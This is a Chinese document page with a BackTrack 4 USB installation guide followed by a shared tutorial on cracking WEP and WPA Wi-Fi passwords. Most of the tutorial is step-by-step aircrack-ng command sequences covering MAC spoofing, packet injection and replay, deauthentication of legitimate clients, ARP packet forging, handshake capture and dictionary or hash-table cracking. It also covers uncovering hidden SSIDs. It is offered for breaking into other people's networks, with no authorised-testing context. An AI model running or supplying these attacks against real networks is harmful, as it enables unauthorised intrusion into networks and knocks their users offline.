视频1 视频21 视频41 视频61 视频文章1 视频文章21 视频文章41 视频文章61 推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37 推荐39 推荐41 推荐43 推荐45 推荐47 推荐49 关键词1 关键词101 关键词201 关键词301 关键词401 关键词501 关键词601 关键词701 关键词801 关键词901 关键词1001 关键词1101 关键词1201 关键词1301 关键词1401 关键词1501 关键词1601 关键词1701 关键词1801 关键词1901 视频扩展1 视频扩展6 视频扩展11 视频扩展16 文章1 文章201 文章401 文章601 文章801 文章1001 资讯1 资讯501 资讯1001 资讯1501 标签1 标签501 标签1001 关键词1 关键词501 关键词1001 关键词1501 专题2001
BT4U盘安装方法
2025-10-04 03:51:32 责编:小OO
文档
BT4U盘安装方法.txt如果你同时爱几个人,说明你年轻;如果你只爱一个人,那么,你已经老了;如果你谁也不爱,你已获得重生。积极的人一定有一个坚持的习惯。

BT4 U盘安装

首先说明,此方法只适用于BT4正式版,因为该版的引导方式与其他版本不同。

下面来说说具体步骤:

一、准备工作:(3个软件在本文章最后提供下载,ISO文件可自己另行下载)

1、bt4-pre-final.iso (系统镜像)

2、grub4dos (软件)

3、dos的引导文件(3个,command、io.sys、msdos.sys )

4、HPUSBFW (惠普的格式化工具)

二、制作步骤:

1、用HPUSBFW软件,以格式化的方式将DOS引导文件写入U盘;

2、将grub4dos解压出来,把里面的 grldr , Grub.exe , menu.lst 这3个文件复制进U盘根目录;

3、把 BT4.iso 里的 boot ,casper 这2个文件夹复制到U盘根目录;

4、用 boot\\grub 目录下的 menu.lst 替换掉U盘根目录下的 menu.lst 这个文件;

三、测试:

1、开机,进入BIOS,设置为U盘优先启动,然后保存并重启;

2、开始时会闪过win 98 的启动界面,然后进入到DOS;

3、输入命令“grub”,然后按回车键,进入到grub引导模式;

4、根据提示和个人需求选择自己想要的模式;

5、系统加载完毕后,使用用户名:root,密码:toor ;进行登录;

6、进入到图形化界面的命令为 startx 。

好了,所有过程都说明白了,大家快开始自己的BT4之旅吧!

附上上面提及到的3个软件的下载链接:

grub4dos

DOS引导文件(因为是系统文件的缘故,需要把文件夹属性中的“隐藏受保护的系统文件”前面的勾去掉,这样就能显示所有的文件了。)

HP_USB_磁盘存储器格式化工具_V2.0.6.rar

WEP破解 BT4破解教程详细解答问题

WEP破解] BT4破解教程详细解答花钱买的,无偿给大家看,鄙视收费的人

记录付费主题, 价格:金币 3 元 1.下载光盘版BT4VM版和虚拟机,制作虚拟启动BT4。VM 版的BT4可能都集成网卡无用,但对USB网卡支持很好。

2.启动BT4,选console控制台模式,用户名root,密码toor<注意不是root>,再运行startx 启动窗口模式。

另:BT4启动黑屏问题解决办法

输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx

我的笔记本是三星R458的,启动BT4,startx时按住空格可以进入.。

在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入

win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开

一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键---------------------end---------------------

[] 可选

<> 回显

/ 或者

() 提示

---------------------WEP---------------------

shell 1:----------------------------------------

1.ifconfig -a

[

macchanger -m 00:11:22:33:44:55 wlan0

<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>

]2.ifconfig -a wlan0 up

(可能要加载网卡才支持注入?)

3.airmon-ng start wlan0 6

(6是频道)

另一说5100要支持注入用airmon-ng start wlan0

如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"

[

aireplay-ng -9 mon0 / aireplay-ng --test mon0

(注入攻击成功/不成功)

(检测你的网卡是否支持注入)

]

4.airodump-ng -w pack -c 6 mon0/wlan0

(pack是随便起的获取的ivs的保存文件的名字)

另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------

一、有客户端:

破解:abcd四种方式

a.合法客户端产生大量有效的数据,能直接获得大量cap。

收到10000以上data后,直接转shell 3,破解密码

b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)

,send 71524 packets ... 很多类似行>

c.合法客户端不在通信,注入模式不成功,

用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,

新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0

6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0 (可能要另开窗)

d.有客户端,并且客户端能产生有效arp 数据的另类破解方式

输入modprobe –r iwl3945

(加载网卡)

输入modprobe ipwraw

输入airmon-ng start wlan0 6

现在,只要一个命令就搞定,输入:

输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。

二、无客户端:

5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0

(我成功了)

另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

(建立虚拟伪装连接)

如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)

破解:abcd四种方式

a.-2 crack mode ---------------

建立虚拟连接后直接用-2交互攻击模式集合了抓包,提数据和发包攻击

6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0

发包成功后可得到足够的ivs,然后用aircrack-ng破解

b.-3 crack mode ---------------

6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0

7.用aircrack-ng破解<自己添加的步骤?>

c.-4 crack mode ---------------

-4攻击模式;制造数据包;-2交互式攻击模式

6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp

(提取上面xor 文件来伪造一个arp包)

8.aireplay-ng -2 -r myarp mon0

一说用aireplay-ng -2 -r myarp -x 512 mon0

(发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)

9.用aircrack-ng破解

d.-5 crack mode ---------------

-5碎片攻击模式;制造数据包;-2交互式攻击模式

(我成功过)

6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0

(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp

(Myarp随便起的文件名)

8.aireplay-ng -2 -r myarp -x 256/512 mon0

(这时,前面的抓包窗口上的data 将迅速增加)

(512是攻击速度,1024是最大值)

9.采用aircrack-ng 来进行破解

shell 3:----------------------------------------

aircrack-ng *.cap

如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs

(我成功了)

另一说用aircrack-ng -n -b APmac pack-01.cap

>附:

5100用BT4+spoonwep2破解

1.把spoonwep2放在BT4\\modules\\下,启动BT4

2.

ln -fs bash /bin/sh

ls -al /bin/sh

<显示bash为成功,dash为失败>

3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,

关闭一下spoonwep2再重启spoonwep2,

这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密

码的出来(sata数据包到30000个左右)。

(注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

---------------------end---------------------

---------------------WPA---------------------

1.ifconfig -a

2.ifconfig -a wlan0 up

3.airmon-ng start wlan0 6

(6是频道)

4.airodump-ng -w 12345 -c 6 mon0/wlan0

(保存名为12345.cap)

(-w:写入文件,-c:截取cap的频道)

5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0

或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)

<18:56:20 Sending directed DeAuth,... 一些类似行>

(-c后面为合法无线客户端的MAC地址)

(迫使AP重新与已连接的合法客户端重新握手验证)

(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万,

因为它只要一个包含WPA握手验证包就可以了)

Cap数据包破解:

a.暴力破解

6.aircrack-ng -x -f 2 12345*.cap

另一说是用aircrack-ng -z -b (ap mac) 12345*.cap

b.字典破解

6.aircrack-ng -w password.txt 12345*.cap

另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

(

-w:是字典破解模式

Password.txt是你事先准备好的字典。

技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认的工作目录在/root)。

请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。

)

c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解

启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap

Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...

d.HASH破解

6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)

(Windows版本操作步骤与其Linux下版本完全一致)

(

参数解释:

-f 这里跟上采用的字典

-d 生成的Table文件名称

-s 目标AP的ESSID

)

7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK

(

参数解释:

-d 导入WPA PMK Hash Table文件名称,下图中为dlink-birth.hash

-r 事先捕获的WPA握手数据包

-s 目标AP的ESSID

)

---------------------end---------------------

WPA破解,怎么知道有握手包被截获?

airodump-ng监视窗右上角有提示:

...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后,cap文件保存在哪?

输入ls可以看到啊,默认在root下。

如何获得合法端mac?

windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用

Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是,若目标网络采用WEP或者WPA加密的话,有时需先行破解再对数据

包解密方可看到客户端MAC。

前面第一个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac BSSID STATION ...

aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

如何查找隐藏的SSID?

1.在BT4下先打开一个shell,输入

airodump-ng 网卡端口

2.打开另一个shell,输入

aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口下载本文

显示全文
专题